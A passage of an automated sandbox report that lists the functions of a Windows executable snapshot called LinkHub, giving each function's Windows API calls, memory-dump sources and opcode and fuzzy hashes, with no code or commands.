                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                        • String ID:
                                                                                        • API String ID: 1550534281-0
                                                                                        • Opcode ID: f4ed66f465dee3d36b1067cf9b0e608a0be8dd3a3623c206ef2a0fa697129f61
                                                                                        • Instruction ID: 65fc1e9d0388932defc793287f03121f178551bce8e33d30edf3116e37fe69c8
                                                                                        • Opcode Fuzzy Hash: f4ed66f465dee3d36b1067cf9b0e608a0be8dd3a3623c206ef2a0fa697129f61
                                                                                        • Instruction Fuzzy Hash: 67F05E31965744EFD340AFB0FD4FB2477A8A714709F044897B908860E3CBBA99689F90
                                                                                        Function 00270B4C Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00271312: InterlockedExchange.KERNEL32(?,?), ref: 00271322
                                                                                          • Part of subcall function 00271312: EnterCriticalSection.KERNEL32(00000000,?), ref: 00271334
                                                                                          • Part of subcall function 00271312: TerminateThread.KERNEL32(00000000,000001F6), ref: 00271342
                                                                                          • Part of subcall function 00271312: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00271350
                                                                                          • Part of subcall function 00271312: CloseHandle.KERNEL32(00000000), ref: 0027135F
                                                                                          • Part of subcall function 00271312: InterlockedExchange.KERNEL32(?,000001F6), ref: 0027136F
                                                                                          • Part of subcall function 00271312: LeaveCriticalSection.KERNEL32(00000000), ref: 00271376
                                                                                        • CloseHandle.KERNELBASE(?,?,00270BBF), ref: 00270B5D
                                                                                        • DeleteCriticalSection.KERNEL32(?,?,00270BBF), ref: 00270B83
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 2929296749-0
                                                                                        • Opcode ID: 5b89d7bbb47f8e1d5dcc6227db26e6944cfc6237a7dc9417f0df6b8457a9809a
                                                                                        • Instruction ID: f22bb92b0ac8036741dfc3a8ba53ddf2ec3fa946a2692ab2ce842d128ee11707
                                                                                        • Opcode Fuzzy Hash: 5b89d7bbb47f8e1d5dcc6227db26e6944cfc6237a7dc9417f0df6b8457a9809a
                                                                                        • Instruction Fuzzy Hash: 05E01231020612EBC7312F64F849A46BBE4BF04311F64885EE09A45821CB70A4A49F08
                                                                                        Function 0020CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __Init_thread_footer.LIBCMT ref: 0020CEEE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Init_thread_footer
                                                                                        • String ID:
                                                                                        • API String ID: 1385522511-0
                                                                                        • Opcode ID: 9f822c5e5c61a6b2d09d7b3f17ea04727d2de0d558eb663241a382c3549373b3
                                                                                        • Instruction ID: b8163e82c3ef4c8e983e3c4ace2e716a41d0697e0582ef702e198edcb331b615
                                                                                        • Opcode Fuzzy Hash: 9f822c5e5c61a6b2d09d7b3f17ea04727d2de0d558eb663241a382c3549373b3
                                                                                        • Instruction Fuzzy Hash: 3E32D4B4A202069FDB10DF58C884BBAB7B5FF48314F25815AEC05AB292C770ED75CB95
                                                                                        Function 00287AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString
                                                                                        • String ID:
                                                                                        • API String ID: 2948472770-0
                                                                                        • Opcode ID: 50627909dfc924102c65c0f9e4f9b5437c98613a8b54fc6374cf098f9f7acd75
                                                                                        • Instruction ID: 1b66e68d0612a39426c8fbe5fd570fa5332927c3c0734bad2811c57a036d5ed7
                                                                                        • Opcode Fuzzy Hash: 50627909dfc924102c65c0f9e4f9b5437c98613a8b54fc6374cf098f9f7acd75
                                                                                        • Instruction Fuzzy Hash: 69D16E74A2520ADFCB14EF98C4819EDBBB5FF48314F24415AE515AB292DB30EDA1CF90
                                                                                        Function 0022F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 411a0bd3b902f0c6a1a6798359d14a43867cac711357140521b29fc55c435e60
                                                                                        • Instruction ID: 8ec37c1b8eb3381f6cce23c69448c0c780ab4b866f2f433cd33c8d821c781170
                                                                                        • Opcode Fuzzy Hash: 411a0bd3b902f0c6a1a6798359d14a43867cac711357140521b29fc55c435e60
                                                                                        • Instruction Fuzzy Hash: 3251F835A20124FFDB50DF98EA40B697BB1EB86324F198274EC189B391D7719D62CB50
                                                                                        Function 00206679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0020668B,?,?,002062FA,?,00000001,?,?,00000000), ref: 0020664A
                                                                                          • Part of subcall function 0020663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0020665C
                                                                                          • Part of subcall function 0020663E: FreeLibrary.KERNEL32(00000000,?,?,0020668B,?,?,002062FA,?,00000001,?,?,00000000), ref: 0020666E
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002062FA,?,00000001,?,?,00000000), ref: 002066AB
                                                                                          • Part of subcall function 00206607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00245657,?,?,002062FA,?,00000001,?,?,00000000), ref: 00206610
                                                                                          • Part of subcall function 00206607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00206622
                                                                                          • Part of subcall function 00206607: FreeLibrary.KERNEL32(00000000,?,?,00245657,?,?,002062FA,?,00000001,?,?,00000000), ref: 00206635
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Load$AddressFreeProc
                                                                                        • String ID:
                                                                                        • API String ID: 2632591731-0
                                                                                        • Opcode ID: f8de2b9407d0b4f8396e51cd0d1a066b464ff4053f8e4c58ca5e2bdf03d7e307
                                                                                        • Instruction ID: 0d68e3cee47707a76183decdbac13c657c3d855817966655c6496a4eb6c3c582
                                                                                        • Opcode Fuzzy Hash: f8de2b9407d0b4f8396e51cd0d1a066b464ff4053f8e4c58ca5e2bdf03d7e307
                                                                                        • Instruction Fuzzy Hash: 4511EB71660305ABCF14AF60C90ABAD77A99F50710F10842DF442A61C3DE76DA35EF50
                                                                                        Function 00238782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wsopen_s
                                                                                        • String ID:
                                                                                        • API String ID: 3347428461-0
                                                                                        • Opcode ID: 936b104aeeec51369cf8decfb46f73a0d7d3589b5f2dc23c843f1bc0c2631ec3
                                                                                        • Instruction ID: ebbe215d261fd2d51dc13701d2535fbd2885eeae97f2d85d5bafa5fddb08a16c
                                                                                        • Opcode Fuzzy Hash: 936b104aeeec51369cf8decfb46f73a0d7d3589b5f2dc23c843f1bc0c2631ec3
                                                                                        • Instruction Fuzzy Hash: CA1148B591420AAFCF05DF58E94499A7BF5EF48300F114069F808AB311DA31EA21CB64
                                                                                        Function 0022E972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
                                                                                        • Instruction ID: 2ad2f6ebe3370376c03dc3cebc04c080eefcbcf24ddd39edbeba89d627cac4f8
                                                                                        • Opcode Fuzzy Hash: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
                                                                                        • Instruction Fuzzy Hash: 83F02D72530630B7DA313EA6BC0175A33588F42334F110727F525971D1DB74E8659AD2
                                                                                        Function 0020B329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 176396367-0
                                                                                        • Opcode ID: b8ac142cbef8e57ca0d44e94c2bf300d569d6418181d64f64cb2967dcc43f7d7
                                                                                        • Instruction ID: 158fe8cb9f97a717d14e07b06f68ccd3426639238fa152b818ee325104caf072
                                                                                        • Opcode Fuzzy Hash: b8ac142cbef8e57ca0d44e94c2bf300d569d6418181d64f64cb2967dcc43f7d7
                                                                                        • Instruction Fuzzy Hash: 46F0C8B36117157ED7259F68D806FA6BBA8EB44360F10812AFA1DCB1D1DB71E5308BA0
                                                                                        Function 0027F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0027F987
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentVariable
                                                                                        • String ID:
                                                                                        • API String ID: 1431749950-0
                                                                                        • Opcode ID: 3ba68b8b6da1b747ec4c5abcecf48cd84735963c3f1afc23ecd27ac011024562
                                                                                        • Instruction ID: 41a725b131a40233aa19350249d3e3a461c0a5ae8dfa9e51508f8b5914c502a6
                                                                                        • Opcode Fuzzy Hash: 3ba68b8b6da1b747ec4c5abcecf48cd84735963c3f1afc23ecd27ac011024562
                                                                                        • Instruction Fuzzy Hash: FFF04472610215BFCB01EBA5DC86D9F77BCEF45710F004055F5099B262DA70ED61CB51
                                                                                        Function 00233B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00220165,?,?,002711D9,0000FFFF), ref: 00233BC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 620b78214540ffe7f2440501543c63c138fb5ec6ac129ec77e4b0941a76b169e
                                                                                        • Instruction ID: 95f5e57ca3c437e870b10a0a68a69868f2ca4b75a08359d8dc9f939cee89422f
                                                                                        • Opcode Fuzzy Hash: 620b78214540ffe7f2440501543c63c138fb5ec6ac129ec77e4b0941a76b169e
                                                                                        • Instruction Fuzzy Hash: 52E0E561230632B6DA20AEB2AC05B5AB64EEF013A4F144162EC04960A1CB70CF2085A0
                                                                                        Function 002066E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9f6982a7b109c6d4672bd31f909caff94ae057c48e03a7e360855ac44d637c0c
                                                                                        • Instruction ID: 8dfa207fcf8f2dd1f9312017ca729ff8457fe1c8370fd5c4d8bbb1b201ca5a27
                                                                                        • Opcode Fuzzy Hash: 9f6982a7b109c6d4672bd31f909caff94ae057c48e03a7e360855ac44d637c0c
                                                                                        • Instruction Fuzzy Hash: 8CF03071125712CFDB389F64E494816B7E4FF14319315893EE5D686521C77198A0DF10
                                                                                        Function 0020684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 2638373210-0
                                                                                        • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                        • Instruction ID: d7f88a650236c1f33ec042d9654d190f444b233e4e6630a05c87eb563609bed3
                                                                                        • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                        • Instruction Fuzzy Hash: C2F0F87551020DFFDF05DF90C941E9EBBB9FB04318F208445F9159A152C376EA21ABA1
                                                                                        Function 00203907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00203963
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_
                                                                                        • String ID:
                                                                                        • API String ID: 1144537725-0
                                                                                        • Opcode ID: 02190345ac2022c54d1c6c3a8735d565d699ad79d90a2e60afea19bccaeb0bb1
                                                                                        • Instruction ID: 87dfdbad85e5ba1cfcd42da7241e124e1f936399669a72c8d6c7683fd3be8a46
                                                                                        • Opcode Fuzzy Hash: 02190345ac2022c54d1c6c3a8735d565d699ad79d90a2e60afea19bccaeb0bb1
                                                                                        • Instruction Fuzzy Hash: 1DF03771915358DFE792DF64EC497957BBCA701708F0000E6A644A6182D7745B9CCF51
                                                                                        Function 00203A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00203A76
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 541455249-0
                                                                                        • Opcode ID: 6691eecbeaccbbb63ecc9c7ba0b9ad1c4441e248c90eb80336e433a9e01226c4
                                                                                        • Instruction ID: 72b15eea019e7e51875ec5ddd52374989047a3e3318fcb90485bb288bb45b88a
                                                                                        • Opcode Fuzzy Hash: 6691eecbeaccbbb63ecc9c7ba0b9ad1c4441e248c90eb80336e433a9e01226c4
                                                                                        • Instruction Fuzzy Hash: E3E0CD7290022457C720D358EC05FDA77DDDFC8790F454071FC05D7259D960DD809990
                                                                                        Function 0026E83E Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0026E857
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderPath_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2987691875-0
                                                                                        • Opcode ID: ef31e86d7de7e62701efd8bd7a077340704e712b49aec964316aae8e3036b291
                                                                                        • Instruction ID: 55c43bbf88a8a69a4efc1b8e1d3e4b844fedef614ac8070109c396f561fe77bc
                                                                                        • Opcode Fuzzy Hash: ef31e86d7de7e62701efd8bd7a077340704e712b49aec964316aae8e3036b291
                                                                                        • Instruction Fuzzy Hash: 77D05EA19003282BDF60A674AC0DDFB3AACC744210F0006A178ADD3192E930EE448AF0
                                                                                        Function 002712EB Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000712D1,00000000,00000000,?), ref: 00271306
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        • Opcode ID: 620a8c3446433265d587af4cdebec72737ae518a2b3eff78ceec253b9dba0358
                                                                                        • Instruction ID: 59521f1727c0bd29fd0519a25b634238a39ed8cb6f36a4e3da86106d365bced2
